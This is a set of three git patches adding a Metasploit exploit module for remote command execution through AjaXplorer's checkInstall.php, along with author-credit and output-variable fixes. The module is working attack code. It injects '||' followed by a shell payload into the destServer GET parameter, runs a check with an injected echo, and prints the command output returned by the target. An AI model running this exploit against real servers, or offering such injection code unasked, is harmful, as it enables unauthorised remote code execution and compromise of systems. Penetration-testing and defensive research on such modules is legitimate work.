From 5b2998a12171ad3a4584d71575b9a255ef916912 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sat, 13 Oct 2012 00:35:48 -0500 Subject: [PATCH 1/3] Add OSVDB-63552 AjaXplorer module (2010) --- .../http/ajaxplorer_checkinstall_exec.rb | 106 ++++++++++++++++++ 1 file changed, 106 insertions(+) create mode 100644 modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb new file mode 100644 index 0000000000..89ebe3b137 --- /dev/null +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -0,0 +1,106 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AjaXplorer checkInstall.php Remote Command Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability in the + AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to + 2.6 are vulnerable. + }, + 'Author' => [ 'David Maciejak' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'OSVDB', '63552' ], + [ 'BID', '39334' ] + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 512, + 'Compat' => + { + 'ConnectionType' => 'find', + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl ruby python bash telnet' + } + }, + 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'windows'], + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'AjaXplorer 2.5.5 or older', { }]], + 'DisclosureDate' => 'Apr 4 2010', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/']) + ], self.class) + end + + def check + target_uri.path << '/' if target_uri.path[-1,1] != '/' + clue = Rex::Text::rand_text_alpha(rand(5) + 5) + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{target_uri.path}plugins/access.ssh/checkInstall.php", + 'vars_get' => { + 'destServer' => "||echo #{clue}" + } + }) + + # If the server doesn't return the default redirection, probably something is wrong + if res and res.code == 200 and res.body =~ /#{clue}/ + return Exploit::CheckCode::Vulnerable + end + + return Exploit::CheckCode::Safe + end + + def exploit + peer = "#{rhost}:#{rport}" + target_uri.path << '/' if target_uri.path[-1,1] != '/' + + # Trigger the command execution bug + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{target_uri.path}plugins/access.ssh/checkInstall.php", + 'vars_get' => + { + 'destServer' => "||#{payload.encoded}" + } + }) + + if res + print_status("#{peer} - The server returned: #{res.code} #{res.message}") + m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || '' + + if m.empty? + print_error("#{peer} - This server may not be vulnerable") + else + print_status("#{peer} - Command output from the server:") + print_line(m[1]) + end + end + end + +end + +=begin +Repo: +http://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/2.6/ +=end \ No newline at end of file From cc303665e81d757736abc03c3c32477b26d29708 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sat, 13 Oct 2012 00:42:44 -0500 Subject: [PATCH 2/3] Credit --- .../exploits/multi/http/ajaxplorer_checkinstall_exec.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index 89ebe3b137..a0c0185f45 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -20,7 +20,12 @@ class Metasploit3 < Msf::Exploit::Remote AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to 2.6 are vulnerable. }, - 'Author' => [ 'David Maciejak' ], + 'Author' => + [ + 'Julien Cayssol', #Credited according to SecurityFocus + 'David Maciejak', #Metasploit module + 'sinn3r' #Final touch on the Metasploit module + ], 'License' => MSF_LICENSE, 'References' => [ From cedcace1a7c82c473b1a97ae469a8400345199fb Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sun, 14 Oct 2012 11:43:33 -0500 Subject: [PATCH 3/3] Forgot to change the output variable Because the original script used match() --- modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index a0c0185f45..eadc667fa9 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote print_error("#{peer} - This server may not be vulnerable") else print_status("#{peer} - Command output from the server:") - print_line(m[1]) + print_line(m) end end end